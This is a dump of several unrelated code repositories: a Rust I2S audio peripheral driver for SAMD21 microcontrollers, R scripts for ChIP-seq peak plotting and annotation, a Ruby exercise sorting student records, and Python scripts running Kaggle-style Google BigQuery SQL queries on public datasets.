fn freq(&self) -> Hertz;
}
impl MasterClock<ClockUnit0> for hal::clock::I2S0Clock {
fn freq(&self) -> Hertz {
self.freq()
}
}
impl MasterClock<ClockUnit1> for hal::clock::I2S1Clock {
fn freq(&self) -> Hertz {
self.freq()
}
}
impl MasterClock<ClockUnit0> for ExternalClock<gpio::Pa9<gpio::PfG>> {
fn freq(&self) -> Hertz {
self.frequency
}
}
#[cfg(any(feature = "min-samd21j"))] // TODO pick min packages for each GPIO pin, also for samd5x
impl MasterClock<ClockUnit0> for ExternalClock<gpio::Pb17<gpio::PfG>> {
fn freq(&self) -> Hertz {
self.frequency
}
}
impl MasterClock<ClockUnit1> for ExternalClock<gpio::Pb10<gpio::PfG>> {
fn freq(&self) -> Hertz {
self.frequency
}
}
pub trait SerialClock<ClockUnit> {}
impl SerialClock<ClockUnit0> for gpio::Pa10<gpio::PfG> {}
impl SerialClock<ClockUnit1> for gpio::Pb11<gpio::PfG> {}
pub trait FrameSync<ClockUnit> {}
impl FrameSync<ClockUnit0> for gpio::Pa11<gpio::PfG> {}
#[cfg(any(feature = "min-samd21j"))]
impl FrameSync<ClockUnit1> for gpio::Pb12<gpio::PfG> {}
/// The I2S peripheral has two serializers; refer to them using this enum
pub enum Serializer {
M0, // 'm' is the datasheet convention
M1,
}
/// The I2S peripheral has two serializers, each can be used as either an input or an output. The
/// SerializerOrientation trait is used to indicate which serializer is used for each direction.
pub trait SerializerOrientation {
const TX_ID: Serializer;
const RX_ID: Serializer;
// Masks are for the interrupt registers
const RECEIVE_READY_MASK: u16;
const RECEIVE_OVERRUN_MASK: u16;
const TRANSMIT_READY_MASK: u16;
const TRANSMIT_UNDERRUN_MASK: u16;
}
/// Transmit from serializer 0, receive on serializer 1
pub struct Tx0Rx1;
impl SerializerOrientation for Tx0Rx1 {
const TX_ID: Serializer = Serializer::M0;
const RX_ID: Serializer = Serializer::M1;
const RECEIVE_READY_MASK: u16 = 1<<1;
const RECEIVE_OVERRUN_MASK: u16 = 1<<5;
const TRANSMIT_READY_MASK: u16 = 1<<8;
const TRANSMIT_UNDERRUN_MASK: u16 = 1<<12;
}
/// Transmit from serializer 1, receive on serializer 0
pub struct Tx1Rx0;
impl SerializerOrientation for Tx1Rx0 {
const TX_ID: Serializer = Serializer::M1;
const RX_ID: Serializer = Serializer::M0;
const RECEIVE_READY_MASK: u16 = 1<<0;
const RECEIVE_OVERRUN_MASK: u16 = 1<<4;
const TRANSMIT_READY_MASK: u16 = 1<<9;
const TRANSMIT_UNDERRUN_MASK: u16 = 1<<13;
}
// TODO make these optional, in particular the Tx one to support PDM mics
pub trait SerializerTx<SerializerOrientation> {}
impl SerializerTx<Tx0Rx1> for gpio::Pa7<gpio::PfG> {}
impl SerializerTx<Tx1Rx0> for gpio::Pa8<gpio::PfG> {}
impl SerializerTx<Tx0Rx1> for gpio::Pa19<gpio::PfG> {}
#[cfg(any(feature = "min-samd21j"))]
impl SerializerTx<Tx1Rx0> for gpio::Pb16<gpio::PfG> {}
pub trait SerializerRx<SerializerOrientation> {}
impl SerializerRx<Tx1Rx0> for gpio::Pa7<gpio::PfG> {}
impl SerializerRx<Tx0Rx1> for gpio::Pa8<gpio::PfG> {}
impl SerializerRx<Tx1Rx0> for gpio::Pa19<gpio::PfG> {}
#[cfg(any(feature = "min-samd21j"))]
impl SerializerRx<Tx0Rx1> for gpio::Pb16<gpio::PfG> {}
pub struct InterruptMask<T> {
mask: u16,
phantom: PhantomData<T>,
}
impl <T> From<u16> for InterruptMask<T> {
fn from(mask: u16) -> InterruptMask<T> {
InterruptMask {
mask,
phantom: PhantomData
}
}
}
impl <T: SerializerOrientation> InterruptMask<T> {
pub fn receive_ready(&self) -> bool {
self.mask & T::RECEIVE_READY_MASK != 0
}
pub fn receive_overrrun(&self) -> bool {
self.mask & T::RECEIVE_OVERRUN_MASK != 0
}
pub fn transmit_ready(&self) -> bool {
self.mask & T::TRANSMIT_READY_MASK != 0
}
pub fn transmit_underrun(&self) -> bool {
self.mask & T::TRANSMIT_UNDERRUN_MASK != 0
}
}
#[derive(Clone, Copy)]
pub struct I2sDmaBuffer(*mut u32);
unsafe impl Buffer for I2sDmaBuffer {
type Beat = u32;
fn dma_ptr(&mut self) -> *mut Self::Beat {
self.0
}
fn incrementing(&self) -> bool {
false
}
fn buffer_len(&self) -> usize {
1
}
}
pub struct I2s<MasterClockSource, SerialClockPin, FrameSyncPin, RxPin, TxPin> {
hw: pac::I2S,
serial_clock_pin: SerialClockPin,
frame_sync_pin: FrameSyncPin,
data_in_pin: RxPin,
data_out_pin: TxPin,
master_clock_source: MasterClockSource,
}
// Need to support three clocking configurations:
// gclck master clock (frequency) => serial clock is output (pin+frequency)
// external master clock (pin+frequency) => serial clock is output (pin+frequency)
// No master clock => serial clock is input (pin)
impl<MasterClockSource, SerialClockPin, FrameSyncPin, RxPin, TxPin>
I2s<MasterClockSource, SerialClockPin, FrameSyncPin, RxPin, TxPin> {
/// master_clock_source, serial_clock_pin, and frame_sync_pin must be attached to the same clock unit
/// TxPin and RxPin need to be connected to different serializer units
pub fn tdm_master<ClkUnit: ClockUnit, SerializerCfg: SerializerOrientation, Freq: Into<Hertz>>(
hw: pac::I2S,
pm: &mut hal::target_device::PM,
master_clock_source: MasterClockSource,
serial_freq: Freq,
number_of_slots: u8,
bits_per_slot: BitsPerSlot,
serial_clock_pin: SerialClockPin,
frame_sync_pin: FrameSyncPin,
data_in_pin: RxPin,
data_out_pin: TxPin,
) -> Self
where
MasterClockSource: MasterClock<ClkUnit>,
SerialClockPin: SerialClock<ClkUnit>,
FrameSyncPin: FrameSync<ClkUnit>,
RxPin: SerializerRx<SerializerCfg>,
TxPin: SerializerTx<SerializerCfg>,
{
// Turn on the APB clock to the I2S peripheral
pm.apbcmask.modify(|_, w| w.i2s_().set_bit());
Self::reset(&hw);
defmt::info!("Master clock running at {:?}", master_clock_source.freq().0);
let master_clock_divisor = (master_clock_source.freq().0 / serial_freq.into().0 - 1) as u8;
defmt::info!("divisor is {:?}", master_clock_divisor);
// unsafe is due to the bits() calls
unsafe {
hw.clkctrl[ClkUnit::ID as usize].write(|w|
w
.mckdiv().bits(master_clock_divisor)
// .mcksel().mckpin() // Use MCK pin as master clock input
// .scksel().sckpin() // Uses SCK pin as input
.sckoutinv().set_bit() // Invert serial clock
.bitdelay().i2s() // 1-bit delay between fsync and data
.fswidth().bit_()
.nbslots().bits(number_of_slots - 1)
.slotsize().variant(bits_per_slot)
);
}
hw.serctrl[SerializerCfg::RX_ID as usize].write(|w| w.clksel().variant(ClkUnit::ID));
hw.serctrl[SerializerCfg::TX_ID as usize].write(|w| w.clksel().variant(ClkUnit::ID).sermode().tx());
// Synchronization doesn't seem to happen until the peripheral is enabled
match ClkUnit::ID {
ClockUnitID::CLK0 => {
hw.ctrla.modify(|_, w| w.cken0().set_bit());
}
ClockUnitID::CLK1 => {
hw.ctrla.modify(|_, w| w.cken1().set_bit());
}
}
hw.ctrla
.modify(|_, w| w.seren0().set_bit().seren1().set_bit());
Self {
hw,
serial_clock_pin,
frame_sync_pin,
data_in_pin,
data_out_pin,
master_clock_source,
}
}
pub fn send<SerializerCfg: SerializerOrientation>(&self, v: u32) -> Result<()>
where
RxPin: SerializerRx<SerializerCfg>,
TxPin: SerializerTx<SerializerCfg>,
{
match SerializerCfg::TX_ID {
Serializer::M0 => {
if self.hw.intflag.read().txrdy0().bit_is_clear() {
return Err(I2SError::WouldBlock);
}
unsafe {
self.hw.data[0].write(|reg| reg.data().bits(v));
}
while self.hw.syncbusy.read().data0().bit_is_set() {}
}
Serializer::M1 => {
if self.hw.intflag.read().txrdy1().bit_is_clear() {
return Err(I2SError::WouldBlock);
}
unsafe {
self.hw.data[1].write(|reg| reg.data().bits(v));
}
while self.hw.syncbusy.read().data1().bit_is_set() {}
}
}
Ok(())
}
/// Gives the peripheral and pins back
pub fn free(
self,
) -> (
pac::I2S,
SerialClockPin,
FrameSyncPin,
RxPin,
TxPin,
MasterClockSource,
) {
(
self.hw,
self.serial_clock_pin,
self.frame_sync_pin,
self.data_in_pin,
self.data_out_pin,
self.master_clock_source,
)
}
/// Blocking software reset of the peripheral
fn reset(hw: &pac::I2S) {
hw.ctrla.write(|w| w.swrst().set_bit());
while hw.syncbusy.read().swrst().bit_is_set() || hw.ctrla.read().swrst().bit_is_set() {}
}
/// Enable the peripheral
pub fn enable(&self) {
self.hw.ctrla.modify(|_, w| w.enable().set_bit());
while self.hw.syncbusy.read().cken0().bit_is_set()
|| self.hw.syncbusy.read().cken1().bit_is_set()
|| self.hw.syncbusy.read().seren0().bit_is_set()
|| self.hw.syncbusy.read().seren1().bit_is_set()
|| self.hw.syncbusy.read().enable().bit_is_set()
{}
}
pub fn enable_receive_ready_interrupt<SerializerCfg: SerializerOrientation>(&self)
where
RxPin: SerializerRx<SerializerCfg>,
TxPin: SerializerTx<SerializerCfg>,
{
unsafe {
self.hw.intenset.write(|w| {
w.bits(SerializerCfg::RECEIVE_READY_MASK)
});
}
}
pub fn enable_receive_overrun_interrupt<SerializerCfg: SerializerOrientation>(&self)
where
RxPin: SerializerRx<SerializerCfg>,
TxPin: SerializerTx<SerializerCfg>,
{
unsafe {
self.hw.intenset.write(|w| {
w.bits(SerializerCfg::RECEIVE_OVERRUN_MASK)
});
}
}
pub fn enable_transmit_ready_interrupt<SerializerCfg: SerializerOrientation>(&self)
where
RxPin: SerializerRx<SerializerCfg>,
TxPin: SerializerTx<SerializerCfg>,
{
unsafe {
self.hw.intenset.write(|w| {
w.bits(SerializerCfg::TRANSMIT_READY_MASK)
});
}
}
pub fn enable_transmit_underrun_interrupt<SerializerCfg: SerializerOrientation>(&self)
where
RxPin: SerializerRx<SerializerCfg>,
TxPin: SerializerTx<SerializerCfg>,
{
unsafe {
self.hw.intenset.write(|w| {
w.bits(SerializerCfg::TRANSMIT_UNDERRUN_MASK)
});
}
}
pub fn get_and_clear_interrupts<SerializerCfg: SerializerOrientation>(&self) -> InterruptMask<SerializerCfg>
where
RxPin: SerializerRx<SerializerCfg>,
TxPin: SerializerTx<SerializerCfg>,
{
let ints = self.hw.intflag.read().bits();
unsafe {
self.hw.intflag.write(|w| {
w.bits(ints)
});
}
InterruptMask::from(ints)
}
pub fn transmit_dma_buffer<SerializerCfg: SerializerOrientation>(&self) -> I2sDmaBuffer
where
RxPin: SerializerRx<SerializerCfg>,
TxPin: SerializerTx<SerializerCfg>,
{
I2sDmaBuffer(
&self.hw.data[SerializerCfg::TX_ID as usize] as *const _ as *mut u32
)
}
pub fn transmit_dma_trigger<SerializerCfg: SerializerOrientation>(&self) -> DmaTriggerSource
where
RxPin: SerializerRx<SerializerCfg>,
TxPin: SerializerTx<SerializerCfg>,
{
match SerializerCfg::TX_ID {
Serializer::M0 => DmaTriggerSource::I2S_TX_0,
Serializer::M1 => DmaTriggerSource::I2S_TX_1,
}
}
pub fn receive_dma_buffer<SerializerCfg: SerializerOrientation>(&self) -> I2sDmaBuffer
where
RxPin: SerializerRx<SerializerCfg>,
TxPin: SerializerTx<SerializerCfg>,
{
I2sDmaBuffer(
&self.hw.data[SerializerCfg::RX_ID as usize] as *const _ as *mut u32
)
}
pub fn receive_dma_trigger<SerializerCfg: SerializerOrientation>(&self) -> DmaTriggerSource
where
RxPin: SerializerRx<SerializerCfg>,
TxPin: SerializerTx<SerializerCfg>,
{
match SerializerCfg::RX_ID {
Serializer::M0 => DmaTriggerSource::I2S_RX_0,
Serializer::M1 => DmaTriggerSource::I2S_RX_1,
}
}
}
| dad8167e3772f2630c176993c20b9a5e0664e102 | [
"TOML",
"Rust",
"Text",
"Markdown"
] | 4 | Text | ianrrees/samd-i2s | 4d74588d3f06175a778cf221b24d20474bfe03f5 | 532a7b5a42908402820dd8349e9d4fd5a6900d0b |
refs/heads/main | <file_sep>#source('lib.R')
library(ggplot2)
library(dplyr)
###
#NAME <- '/H3K36me3_H1.intersect_w_DeepZ'
#NAME <- '/DeepZ'
#NAME <- '/H3K36me3_H1.ENCFF295UVV.hg19'
#NAME <- '/H3K36me3_H1.ENCFF327EZJ.hg19'
getwd()
###
setwd("C:/Users/Ilya_Pakhalko/Documents/BioProject")
bed_df <- read.delim(paste0(DATA_DIR, NAME, '.bed'), as.is = TRUE, header = FALSE)
#colnames(bed_df) <- c('chrom', 'start', 'end', 'name', 'score')
colnames(bed_df) <- c('chrom', 'start', 'end')
bed_df$len <- bed_df$end - bed_df$start
ggplot(bed_df) +
aes(x = len) +
geom_histogram() +
ggtitle(NAME, subtitle = sprintf('Number of peaks = %s', nrow(bed_df))) +
theme_bw()
ggsave(paste0('len_hist.', NAME, '.pdf'), path = OUT_DIR)<file_sep># hse21_H3K36me3_ZDNA_human
Отчёт можно найти в корневой папке репозитория либо почитать по ссылке: https://docs.google.com/document/d/1kyM7NmsIqCi_P6IENprY7LOAD7JMK1S4PklL5Fd8xTw/edit?usp=sharing
<file_sep>###
if (!requireNamespace("BiocManager", quietly = TRUE))
install.packages("BiocManager")
BiocManager::install("TxDb.Hsapiens.UCSC.hg19.knownGene", force=TRUE)
#BiocManager::install("TxDb.Mmusculus.UCSC.mm10.knownGene")
BiocManager::install("ChIPseeker", force=TRUE)
library(ChIPseeker)
library(TxDb.Hsapiens.UCSC.hg19.knownGene)
#library(TxDb.Mmusculus.UCSC.mm10.knownGene)
install.packages("stringi")
BiocManager::install("clusterProfiler", force=TRUE)
library(clusterProfiler)
###
#NAME <- 'H3K36me3_H1.intersect_w_DeepZ'
#NAME <- 'DeepZ'
#NAME <- 'H3K36me3_H1.ENCFF295UVV.hg19.filtered'
#NAME <- 'H3K36me3_H1.ENCFF327EZJ.hg19.filtered'
getwd()
#setwd()
DATA_DIR <- getwd()
BED_FN <- paste0(getwd(), '/',NAME, '.bed')
###
txdb <- TxDb.Hsapiens.UCSC.hg19.knownGene
peak <- readPeakFile(BED_FN)
#install.packages("org.Hs.eg.db")
#BiocManager::install("org.Hs.eg.db", force=TRUE)
#library("org.Hs.eg.db")
peakAnno <- annotatePeak(peak, tssRegion=c(-3000, 3000), TxDb=txdb, annoDb="org.Hs.eg.db")
#pdf(paste0(OUT_DIR, 'chip_seeker.', NAME, '.plotAnnoPie.pdf'))
OUT_DIR <- getwd()
png(paste0(OUT_DIR, '/chip_seeker.', NAME, '.plotAnnoPie.png'))
plotAnnoPie(peakAnno)
dev.off()
# peak <- readPeakFile(BED_FN)
#png(paste0(OUT_DIR, '/chip_seeker.', NAME, '.covplot.png'))
#covplot(peak, weightCol="V5")
#dev.off()
# | 92f41b5b7aac0cebad699db3f685e8a1fd917c32 | [
"Markdown",
"R"
] | 3 | R | ilyaphlk/hse21_H3K36me3_ZDNA_human | 2e186b169e18f93a6b9414bb111e7dcdf7e1597f | 18c6598d20f4c066ea30819f8806d73d9cbf05e1 |
refs/heads/master | <repo_name>shubha-rajan/array_or_hash<file_sep>/README.md
# Array or Hash
How we organize our data matters. Different structuring of data allows for optimizing different algorithms for common methods on the data. Examples of common methods on data include: sorting the data based on a criteria, looking up information for a specific data set, adding data, deleting data etc.
## Exercises
- Consider the example we looked at with the [Student Account Generator exercise](https://github.com/Ada-Developers-Academy/jump-start/blob/master/learning-to-code/arrays/assignments/account-generator.md) There are various different ways to organize this data. Let's scope our attention down to two options. Take some time to consider the pros and cons of these two options:
<ol>
<li> as an Array of hashes </li>
<li> as a Hash of hashes </li>
</ol>
- [Optional] Take some time to understand the [linked code](./array_or_hash.rb) showing student account generator as an array of hashes and as a hash of hashes.
<file_sep>/array_or_hash.rb
# Student account generator data as an array of hashes
students_data_array = [
{
name: "<NAME>",
id: 123256,
email: "<EMAIL>"
},
{
name: "<NAME>",
id: 349222,
email: "<EMAIL>"
},
{
name: "<NAME>",
id: 999999,
email: "<EMAIL>"
}
]
puts "Here's the student data array:"
puts students_data_array
puts
# Arrays allow for sorting information according to our criteria
# Let's organize the data alphabetically based on first name
puts "Here's the student data array in ascending first name order"
# implements selection sort on name value
(students_data_array.count - 1).times do |j|
# for each index in the array, select the right data set for that index
# Note: if all except the last index have the right data, then by default
# the last index will have the right data. That's why this loop runs
# (student count - 1) times.
select_index = j # assume that at index j, the correct data is present
i = j + 1 # starting at the index following the current index, j
# go through all entries after index j to check if any data is better suited
# for index j based on ascending first name criteria
while i < students_data_array.count
if students_data_array[select_index][:name] > students_data_array[i][:name]
# found a better data to place at selected index j
select_index = i
end
i += 1
end
if !(select_index == j) # we found a better data set for index j
# swap data at index j with data at select_index
temp = students_data_array[j]
students_data_array[j] = students_data_array[select_index]
students_data_array[select_index] = temp
end
end
puts students_data_array
puts "-------------------------------------------------------------------------"
puts
# Student account generator data as a hash of hashes
students_data_hash = {
"<NAME>" => {
id: 123256,
email: "<EMAIL>"
},
"<NAME>" => {
id: 349222,
email: "<EMAIL>"
},
"<NAME>" => {
id: 999999,
email: "<EMAIL>"
}
}
puts "Here's the student data hash"
puts students_data_hash
# Hashes allow us to do quick look ups
student_lookup = true
while student_lookup
print "Enter the full name of the student whose information you'd like to have: "
name_key = gets.chomp
if students_data_hash[name_key]
puts "Here's the information for #{name_key}"
puts students_data_hash[name_key]
else
puts "Information not found for #{name_key}"
end
puts "Would you like to do another look up? Enter 'y' or 'Y' for yes."
student_lookup = (gets.chomp.downcase == 'y')
end
| d749c72a2fa33d87fcb3f7217819716fd47577d9 | [
"Markdown",
"Ruby"
] | 2 | Markdown | shubha-rajan/array_or_hash | 69a9f9e3c15b6d4ad1f17705e0a5dbf501bce2b1 | ca93b182da0f5a6cda44fc57b1e6b4e05995b66c |
refs/heads/master | <file_sep># Objective
Looking for ways to refresh my SQL coding, I've stumbled upon a Kaggle on-line course to learn how to use Google BigQuery. It's a nice and fun way to learn about a new tool! This led me to enroll to the Kaggle SQL summer camp: Can't wait to learn new stuff.
In the meantime, I've gathered the templates for later use of bigquery commands.
# Contents
Bigquery programs to run basic SQL commands based on a Kaggle tutorial.
# Using GoogleCloudPlatform
You have to have the bigquery library installed from Google Cloud. Then make sure you're authenticated on Google Cloud Platform. See https://cloud.google.com/bigquery/docs/reference/libraries#client-libraries-install-python for more info.
# Source of data
Kaggle's introduction to SQL for working with databases, using Google BigQuery to scale to massive datasets.
https://www.kaggle.com/learn/intro-to-sql
<file_sep>
# import libraries
from google.cloud import bigquery
# create a client object
client = bigquery.Client()
# Construct a reference to the "nhtsa_traffic_fatalities" dataset
dataset_ref = client.dataset("nhtsa_traffic_fatalities", project="bigquery-public-data")
# API request - fetch the dataset
dataset = client.get_dataset(dataset_ref)
# construct a reference to the "accident_2015" table
table_ref = dataset_ref.table("accident_2015")
# API request - fetch the table
table = client.get_table(table_ref)
# Print information on all the columns in the "accident_2015" table in the "nhtsa_traffic_fatalities" dataset
table.schema
# Print information on all the columns in the "accident_2015" table in the "nhtsa_traffic_fatalities" dataset
client.list_rows(table, max_results = 5).to_dataframe()
# query
# Query to find out the number of accidents for each day of the week
query = """
SELECT COUNT(consecutive_number) AS num_accidents,
EXTRACT(DAYOFWEEK FROM timestamp_of_crash) AS day_of_week
FROM `bigquery-public-data.nhtsa_traffic_fatalities.accident_2015`
GROUP BY day_of_week
ORDER BY num_accidents DESC
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 1 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**9)
query_job = client.query(query, job_config=safe_config)
# API request - run the query, and convert the results to a pandas DataFrame
accidents_by_day = query_job.to_dataframe()
# Print the DataFrame
accidents_by_day
<file_sep>from google.cloud import bigquery
# Create a "Client" object
client = bigquery.Client()
# Construct a reference to the "crypto_bitcoin" dataset
dataset_ref = client.dataset("crypto_bitcoin", project="bigquery-public-data")
# API request - fetch the dataset
dataset = client.get_dataset(dataset_ref)
# Construct a reference to the "transactions" table
table_ref = dataset_ref.table("transactions")
# API request - fetch the table
table = client.get_table(table_ref)
# Preview the first five lines of the "transactions" table
transactions = client.list_rows(table, max_results=5).to_dataframe()
# Query to select the number of transactions per date, sorted by date
query_with_CTE = """
WITH time AS
(SELECT DATE(block_timestamp) AS trans_date
FROM `bigquery-public-data.crypto_bitcoin.transactions`
)
SELECT COUNT(1) AS num_transactions,
trans_date
FROM time
GROUP BY trans_date
ORDER BY trans_date
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 10 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**10)
query_job = client.query(query_with_CTE, job_config=safe_config)
# API request - run the query, and convert the results to a pandas DataFrame
transactions_by_date = query_job.to_dataframe()
# Print the first five rows
transactions_by_date.head()
<file_sep>
# import libraries
from google.cloud import bigquery
# create a client object
client = bigquery.Client()
### --------------------------------------------------------------------------
### SELECT FROM
### --------------------------------------------------------------------------
# Construct a reference to the "openaq" dataset
dataset_ref = client.dataset("openaq", project="bigquery-public-data")
# https://openaq.org/#/?_k=esd1sb
# API request - fetch the dataset
dataset = client.get_dataset(dataset_ref)
# construct a reference to the "global_air_quality" table
table_ref = dataset_ref.table("global_air_quality")
# API request - fetch the table
table = client.get_table(table_ref)
# Print information on all the columns in the "global_air_quality" table in the "openaq" dataset
table.schema
# Print information on all the columns in the "global_air_quality" table in the "openaq" dataset
full = client.list_rows(table, max_results = 5).to_dataframe()
full.info()
# query
query = """
SELECT city
FROM `bigquery-public-data.openaq.global_air_quality`
WHERE country = 'US'
"""
# Set up the query
query_job = client.query(query)
# API request - run the query, and return a pandas DataFrame
us_cities = query_job.to_dataframe()
# What five cities have the most measurements?
us_cities['city'].value_counts().head()
us_cities.city.value_counts().head()
### --------------------------------------------------------------------------
# multiple selection
query = """
SELECT city, country
FROM `bigquery-public-data.openaq.global_air_quality`
WHERE country = 'US'
"""
### --------------------------------------------------------------------------
# select all
query = """
SELECT *
FROM `bigquery-public-data.openaq.global_air_quality`
WHERE country = 'France'
"""
### --------------------------------------------------------------------------
# select distinct values
first_query = """
SELECT DISTINCT country
FROM `bigquery-public-data.openaq.global_air_quality`
WHERE unit = 'ppm'
"""
### --------------------------------------------------------------------------
# working with big datasets
### --------------------------------------------------------------------------
query = """
SELECT score, title
FROM `bigquery-public-data.hacker_news.full`
WHERE type = 'job'
"""
### --------------------------------------------------------------------------
### OPTION 1
### --------------------------------------------------------------------------
"""
Option 1: To begin,you can estimate the size of any query before running it. Here is an
example using the (very large!) Hacker News dataset. To see how much data a query will scan,
we create a
QueryJobConfig object and set the dry_run parameter to True .
"""
# Create a QueryJobConfig object to estimate size of query without r unning it
dry_run_config = bigquery.QueryJobConfig(dry_run = True)
# API request - dry run query to estimate costs
dry_run_query_job = client.query(query, job_config = dry_run_config)
print("This query will process {} bytes.".format(dry_run_query_job.total_bytes_processed))
### --------------------------------------------------------------------------
### OPTION 2
### --------------------------------------------------------------------------
"""
Option 2: You can also specify a parameter when running the query to limit how much
data you are willing to scan. Here's an example with a low limit.
"""
# Only run the query if it's less than 100 MB
ONE_HUNDRED_MB = 100*1000*1000
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=ONE_HUNDRED_MB)
# Set up the query (will only run if it's less than 100 MB)
safe_query_job = client.query(query, job_config=safe_config)
# API request - try to run the query, and return a pandas DataFrame
safe_query_job.to_dataframe()
### --------------------------------------------------------------------------
# Only run the query if it's less than 1 Go
ONE_GB = 1000*1000*1000
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=ONE_GB)
# Set up the query (will only run if it's less than 100 MB)
safe_query_job = client.query(query, job_config=safe_config)
# API request - try to run the query, and return a pandas DataFrame
job_post_scores = safe_query_job.to_dataframe()
# Print average score for job posts
job_post_scores.score.mean()
<file_sep>from google.cloud import bigquery
# Create a "Client" object
client = bigquery.Client()
# Construct a reference to the "chicago_taxi_trips" dataset
dataset_ref = client.dataset("chicago_taxi_trips", project="bigquery-public-data")
# API request - fetch the dataset
dataset = client.get_dataset(dataset_ref)
# List all the tables in the "chicago_taxi_trips" dataset
tables = list(client.list_tables(dataset))
# print list of tables
for table in tables:
print(table.table_id)
# Construct a reference to the "taxi_trips" table
table_ref = dataset_ref.table("taxi_trips")
# API request - fetch the table
table = client.get_table(table_ref)
# Preview the first five lines of the "taxi_trips" table
taxi_trips = client.list_rows(table, max_results=5).to_dataframe()
taxi_trips.info()
### --------------------------------------------------------------------------
### RIDES PER YEAR
### --------------------------------------------------------------------------
# Query to select the number of rides per year, sorted by year
rides_per_year_query = """
SELECT EXTRACT(YEAR FROM trip_start_timestamp) AS year,
COUNT(1) AS num_trips
FROM `bigquery-public-data.chicago_taxi_trips.taxi_trips`
GROUP BY year
ORDER BY year
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 10 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**10)
rides_per_year_query_job = client.query(rides_per_year_query, job_config=safe_config)
# API request - run the query, and convert the results to a pandas DataFrame
rides_per_year_result = rides_per_year_query_job.to_dataframe()
### --------------------------------------------------------------------------
### RIDES PER MONTH
### --------------------------------------------------------------------------
# Query to select the number of rides per month in 2017
rides_per_month_query = """
SELECT EXTRACT(MONTH FROM trip_start_timestamp) AS month,
COUNT(1) AS num_trips
FROM `bigquery-public-data.chicago_taxi_trips.taxi_trips`
WHERE EXTRACT(YEAR FROM trip_start_timestamp) = 2017
GROUP BY month
ORDER BY month
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 10 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**10)
rides_per_month_query_job = client.query(rides_per_month_query, job_config=safe_config)
# API request - run the query, and convert the results to a pandas DataFrame
rides_per_month_result = rides_per_month_query_job.to_dataframe()
### --------------------------------------------------------------------------
### SPEED
### --------------------------------------------------------------------------
# Query to assess the average speed per hour of day in H1 of 2017
speeds_query = """
WITH RelevantRides AS
(
SELECT trip_start_timestamp,
trip_miles,
trip_seconds
FROM `bigquery-public-data.chicago_taxi_trips.taxi_trips`
WHERE EXTRACT(YEAR FROM trip_start_timestamp) = 2017
AND EXTRACT(MONTH FROM trip_start_timestamp) >=1
AND EXTRACT(MONTH FROM trip_start_timestamp) <= 6
AND trip_seconds > 0
AND trip_miles > 0
)
SELECT EXTRACT(HOUR FROM trip_start_timestamp) AS hour_of_day,
3600 * SUM(trip_miles) / SUM(trip_seconds) AS avg_mph,
COUNT(1) AS num_trips
FROM RelevantRides
GROUP BY hour_of_day
ORDER BY hour_of_day
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 10 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**10)
speeds_query_job = client.query(speeds_query, job_config=safe_config)
# API request - run the query, and convert the results to a pandas DataFrame
speeds_result = speeds_query_job.to_dataframe()
### --------------------------------------------------------------------------
### SPEED - ANSWER
### --------------------------------------------------------------------------
speeds_query = """
WITH RelevantRides AS
(
SELECT EXTRACT(HOUR FROM trip_start_timestamp) AS hour_of_day,
trip_miles,
trip_seconds
FROM `bigquery-public-data.chicago_taxi_trips.taxi_trips`
WHERE trip_start_timestamp > '2017-01-01' AND
trip_start_timestamp < '2017-07-01' AND
trip_seconds > 0 AND
trip_miles > 0
)
SELECT hour_of_day,
COUNT(1) AS num_trips,
3600 * SUM(trip_miles) / SUM(trip_seconds) AS avg_mph
FROM RelevantRides
GROUP BY hour_of_day
ORDER BY hour_of_day
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 1 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**10)
speeds_query_job = client.query(speeds_query, job_config=safe_config)
# API request - run the query, and return a pandas DataFrame
speeds_result = speeds_query_job.to_dataframe()
# View results
print(speeds_result)
### --------------------------------------------------------------------------
### SPEED
### --------------------------------------------------------------------------
# Query to assess the max trip miles and min trip duration per hour of day in H1 of 2017
speeds_investigation_query = """
WITH RelevantRides AS
(
SELECT trip_start_timestamp,
trip_miles,
trip_seconds
FROM `bigquery-public-data.chicago_taxi_trips.taxi_trips`
WHERE EXTRACT(YEAR FROM trip_start_timestamp) = 2017
AND EXTRACT(MONTH FROM trip_start_timestamp) >=1
AND EXTRACT(MONTH FROM trip_start_timestamp) <= 6
AND trip_seconds > 0
AND trip_miles > 0
)
SELECT EXTRACT(HOUR FROM trip_start_timestamp) AS hour_of_day,
MAX(trip_miles) AS max_trip_miles,
MIN(trip_seconds) AS min_trip_seconds,
COUNT(1) AS num_trips
FROM RelevantRides
GROUP BY hour_of_day
ORDER BY hour_of_day
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 10 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**10)
speeds_investigation_query_job = client.query(speeds_investigation_query, job_config=safe_config)
# API request - run the query, and return a pandas DataFrame
speeds_investigation_result = speeds_investigation_query_job.to_dataframe()
### --------------------------------------------------------------------------
# Query to assess the average trip miles and average trip duration per hour of day in H1 of 2017
speeds_investigation_query = """
WITH RelevantRides AS
(
SELECT trip_start_timestamp,
trip_miles,
trip_seconds
FROM `bigquery-public-data.chicago_taxi_trips.taxi_trips`
WHERE EXTRACT(YEAR FROM trip_start_timestamp) = 2017
AND EXTRACT(MONTH FROM trip_start_timestamp) >=1
AND EXTRACT(MONTH FROM trip_start_timestamp) <= 6
AND trip_seconds > 0
AND trip_miles > 0
)
SELECT EXTRACT(HOUR FROM trip_start_timestamp) AS hour_of_day,
AVG(trip_miles) AS avg_trip_miles,
AVG(trip_seconds) AS avg_trip_seconds,
COUNT(1) AS num_trips
FROM RelevantRides
GROUP BY hour_of_day
ORDER BY hour_of_day
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 10 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**10)
speeds_investigation_query_job = client.query(speeds_investigation_query, job_config=safe_config)
# API request - run the query, and return a pandas DataFrame
